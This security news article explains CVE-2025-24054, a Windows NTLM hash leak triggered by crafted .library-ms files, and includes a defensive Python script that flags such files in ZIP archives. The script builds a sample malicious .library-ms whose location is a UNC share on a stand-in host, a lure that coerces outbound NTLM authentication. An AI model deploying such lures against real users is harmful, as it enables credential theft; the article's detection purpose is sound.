In April 2025 the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a medium-severity Microsoft Windows flaw to its Known Exploited Vulnerabilities (KEV) catalog after confirming that it was being exploited in the wild. The flaw, tracked as CVE-2025-24054, is a spoofing vulnerability in Windows New Technology LAN Manager (NTLM), the legacy challenge-response authentication protocol. Although Microsoft shipped a fix in March 2025, threat actors have continued to exploit it against unpatched systems, putting user credentials and the systems they unlock at risk.
Overview of the Vulnerability
CVE-2025-24054 carries a CVSS score of 6.5 (medium). It is an NTLM hash disclosure issue: an unauthenticated attacker on the network can coerce a victim's machine into authenticating to an attacker-controlled server, which captures the user's NTLM hash in the form of the Net-NTLMv2 challenge-response. That response is not the raw NT hash and cannot be used directly for pass-the-hash, but it can be cracked offline or relayed to other services where NTLM relay protections are not enforced. NTLM, which Microsoft formally deprecated in favor of Kerberos in 2024, has long been a target of exactly these techniques.
The vulnerability requires minimal user interaction. Merely interacting with a specially crafted .library-ms file in Windows Explorer (selecting it, inspecting its properties, or right-clicking it) is enough to make the system reach out to the attacker's server and authenticate. Microsoft patched the issue in its March 2025 Patch Tuesday release. From March 19, 2025, roughly a week after the patch, active exploitation was observed in the wild, confirming that attackers had reverse-engineered the fix and were targeting systems that had not yet applied it.
The flaw is considered a variant of CVE-2024-43451, an NTLM hash disclosure vulnerability that was itself exploited in attacks during 2024. The CVE-2025-24054 campaigns have mostly targeted government and private-sector institutions, with activity concentrated in Poland and Romania. The initial access vector is social engineering: malspam emails carrying links to Dropbox-hosted archives that contain the malicious .library-ms file.
What Undercode Says:
CVE-2025-24054 represents a serious risk for organizations still relying on NTLM, a deprecated protocol whose weaknesses are well understood by attackers. Microsoft's decision to phase out NTLM in favor of Kerberos has not deterred anyone from targeting it; if anything, this vulnerability shows the ongoing exposure that legacy authentication creates. The exploitation that followed the patch also shows how quickly attackers turn a fixed bug into a weapon against environments that lag on updates.
The minimal user interaction required makes the flaw more dangerous than its CVSS score suggests. Users do not need to run or open anything: simply downloading and extracting a malicious ZIP archive containing the .library-ms file can be enough, because Explorer processes the library description as soon as the file is written and displayed. This ease of exploitation, combined with the captured NTLM challenge-response, gives attackers a credential they can crack offline or relay, enabling lateral movement and privilege escalation inside a compromised network. For organizations that have not yet fully mitigated NTLM exposure, this is an urgent concern.
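The two passages above describe the lure: a .library-ms file, delivered inside a ZIP, whose library description points at a remote share so that Explorer authenticates to the attacker's server. A .library-ms file is plain XML in Microsoft's public Windows Library Description schema, which makes the pattern easy to triage at a mail gateway or in a sandbox. The script below is an added example written for this article, not code from the original report, Microsoft, or Check Point. It builds a constructed sample archive in memory (the host 192.0.2.10 and share name are made up for the demonstration), then flags every .library-ms member whose location is a UNC path or a remote URL rather than a local folder.

```python
"""Triage helper: flag .library-ms files inside ZIP archives whose library
location points at a remote host, the lure pattern used with CVE-2025-24054.

Added example for this article; not from the original report, Microsoft, or
Check Point. The sample archive, host (192.0.2.10) and share are constructed.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Namespace of the Windows Library Description schema used by .library-ms files.
LIBRARY_NS = "{http://schemas.microsoft.com/windows/2009/library}"

# \\host\share or //host/share (with or without a trailing path separator).
UNC_RE = re.compile(r"^(?:\\\\|//)[^\\/]+(?:[\\/]|$)")


def library_locations(xml_bytes):
    """Return every <simpleLocation><url> value in a .library-ms document.

    Raises xml.etree.ElementTree.ParseError if the document is not well-formed XML.
    """
    root = ET.fromstring(xml_bytes)
    urls = []
    for loc in root.iter(LIBRARY_NS + "simpleLocation"):
        url = loc.find(LIBRARY_NS + "url")
        if url is not None and url.text:
            urls.append(url.text.strip())
    return urls


def is_remote(location):
    """True if the location would make Explorer contact another host.

    UNC paths are remote; URL-scheme locations are remote when they carry a
    non-loopback host. Drive paths (C:\\...) and knownfolder:{GUID} are local.
    """
    loc = location.strip()
    if UNC_RE.match(loc):
        return True
    parsed = urlparse(loc)
    # len(scheme) > 1 excludes drive letters, which urlparse reports as a scheme.
    if parsed.scheme and len(parsed.scheme) > 1 and parsed.netloc:
        return parsed.netloc.lower() not in ("localhost", "127.0.0.1")
    return False


def scan_zip(zip_bytes):
    """Return a list of findings for .library-ms members that point off-host.

    Each finding is {"member": name, "location": url or None, "reason": text}.
    An unparseable .library-ms is reported too: it should never reach a user.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".library-ms"):
                continue
            try:
                locations = library_locations(zf.read(info))
            except ET.ParseError:
                findings.append({"member": info.filename, "location": None,
                                 "reason": "unparseable library description"})
                continue
            for loc in locations:
                if is_remote(loc):
                    findings.append({"member": info.filename, "location": loc,
                                     "reason": "remote location triggers outbound authentication"})
    return findings


# Constructed benign library: points at the local Documents known folder.
BENIGN_LIBRARY = b"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""

# Constructed malicious library: points at an attacker-controlled SMB share
# (192.0.2.10 is a documentation address, chosen here for the example).
MALICIOUS_LIBRARY = b"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\\\192.0.2.10\\share</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""


def build_sample_zip():
    """Constructed sample archive: one benign and one malicious .library-ms."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/Documents.library-ms", BENIGN_LIBRARY)
        zf.writestr("invoice/document.library-ms", MALICIOUS_LIBRARY)
        zf.writestr("readme.txt", b"nothing to see here")
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_zip(build_sample_zip()):
        print(finding)
```

Run it on an attachment or sandbox sample to get a list of offending archive members and the hosts they would contact; the same check generalizes to .url, .lnk and .website lures that embed UNC targets, though this script only parses the library schema. Detection is a stop-gap: the patch, blocking outbound TCP 445 at the perimeter, and restricting outgoing NTLM traffic to remote servers are what remove the exposure.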
The attacks seen so far have largely targeted government and private-sector organizations in Poland, Romania, and other regions. Check Point Research reports more than ten separate campaigns, all aimed at harvesting NTLM hashes through malicious .library-ms files. Attackers use the captured hashes to gain unauthorized access to sensitive systems, often as the first step in a larger breach.
Organizations that have not yet applied the March 2025 update remain exposed to ongoing exploitation. Beyond patching, two long-standing mitigations for NTLM hash leaks still apply: block outbound SMB (TCP 445) at the network perimeter so coerced authentications never reach an attacker's server, and enable the "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" policy where the environment tolerates it. For agencies in the Federal Civilian Executive Branch (FCEB), CISA's KEV listing sets a hard deadline of May 8, 2025, to apply the patch.
Fact Checker Results:
- Exploitability: CVE-2025-24054 is actively exploited, despite Microsoft's initial assessment of "Exploitation Less Likely."
- Targeted Entities: Attackers have specifically targeted government and private sector institutions, mainly in Poland and Romania.
- Urgency: CISA's inclusion of this vulnerability in the KEV catalog underscores its severity and the need for immediate remediation.
References:
Reported By: thehackernews.com